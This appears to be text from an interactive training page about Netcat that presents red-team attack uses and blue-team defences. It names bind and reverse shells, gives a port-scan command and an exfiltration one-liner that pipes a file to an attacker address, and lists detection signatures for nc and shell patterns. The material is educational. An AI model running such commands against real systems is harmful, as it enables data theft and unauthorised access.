Netcat

The TCP/IP Swiss Army knife for networking operations

IntermediateInteractive Dual Perspective

Netcat (nc) is a networking utility for reading from and writing to network connections using TCP or UDP. It's called the "Swiss Army knife" of networking for its versatility in debugging, port scanning, file transfers, and creating backdoors.

🔴 RED TEAM

Establish reverse shells, create backdoors, transfer files stealthily, pivot through networks, and maintain persistence.

🔵 BLUE TEAM

Test port connectivity, debug network services, validate firewall rules, and detect unauthorized connections.

Netcat Operations Center

The TCP/IP Swiss Army knife - Connection relay, port scanner, backdoor listener, file transfer

Listener Port:

Network Topology

Attacker

192.168.1.100

Target

10.0.0.50

:4444

IDLE

Detection Risk0%

Interactive Shell

nc -lvnp 4444

Listening on 0.0.0.0 4444

Packet Flow Log

🔴 RED TEAM: Attack Techniques

Bind Shell: nc -lvnp 4444 on target, attacker connects
Reverse Shell: Target calls back to attacker listener
File Exfiltration: nc -w 3 10.0.0.1 4444 < data.txt
Port Scanning: nc -zv target 1-1000

🔵 BLUE TEAM: Detection & Defense

Monitor: netstat -tulnp | grep LISTEN
Firewall: Block non-standard ports, restrict outbound
IDS Signatures: Alert on nc, /bin/sh, reverse shell patterns
Log Analysis: Unusual ports, persistent connections, data transfers

Netcat

Theory & Documentation

What is Netcat?

🔴 RED TEAM

🔵 BLUE TEAM

Common Use Cases

Command Reference

Defense Strategies